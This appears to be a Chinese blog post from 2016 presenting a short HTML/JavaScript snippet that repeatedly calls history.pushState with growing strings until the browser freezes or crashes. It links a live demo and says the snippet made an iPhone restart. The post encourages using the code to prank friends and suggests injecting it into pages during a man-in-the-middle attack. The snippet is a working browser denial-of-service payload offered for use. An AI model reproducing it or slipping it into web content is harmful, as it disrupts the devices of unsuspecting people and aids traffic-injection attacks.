这十二行代码是如何让浏览器爆炸的?(可以整蛊下你的好友) | 祭夜の咖啡馆
  • 充值系统已开放,修复了一些BUG

  • 各项服务恢复正常

  • 修复在线人数的显示

  • 修复了Baidu与Github登陆的小Bug

  • 优化网站整体代码布局,提高速度

这十二行代码是如何让浏览器爆炸的?(可以整蛊下你的好友)

其他 祭夜ゐ 4年前 (2016-02-17) 1015次浏览 已收录 0个评论 扫描二维码

完整HTML代码如下:

<html><body><script>var total="";for (var i=0;i<1000000;i++){    total= total+i.toString();    history.pushState(0,0,total);}</script></body></html>

demo:(温馨提示:请保存浏览器其它窗口的编辑任务)

https://www.jysafe.cn/demo.html

接来下会发生什么?
点开以后,我的状态是这样的:

这十二行代码是如何让浏览器爆炸的?(可以整蛊下你的好友)

如果你是PC端用户,点开链接以后,电脑CPU内存极有可能一路狂飙直至浏览器崩溃卡死!
如果你是移动端(安卓、iPhone)用户,点开链接以后你的浏览器会闪退!在微博、微信客户端点开链接同样会闪退。至于在推文中提到的让iPhone重启,这一现象倒是没有出现。22:49 修正:iPhone用Safari打开之后链接之后,手机注销重启了!…
思考
这是Bug还是0day?为什么会有这一现象?如何实现的?
有哪些比较有意思的利用姿势?(我先来个:当在执行MITM中间人攻击的时候,可以注入这一段js,来个恶搞整蛊。然后都懂的…)

原文来自:http://blog.cccyun.cn/post-239.html


祭夜blog , 版权所有丨如未注明 , 均为原创丨本网站采用BY-NC-SA协议进行授权
转载请注明原文链接:这十二行代码是如何让浏览器爆炸的?(可以整蛊下你的好友)
喜欢 (0)
[1690127128@qq.com]
分享 (0)
发表我的评论
取消评论
表情 贴图 加粗 删除线 居中 斜体 签到

Hi,您需要填写昵称和邮箱!

  • 昵称 (必填)
  • 邮箱 (必填)
  • 网址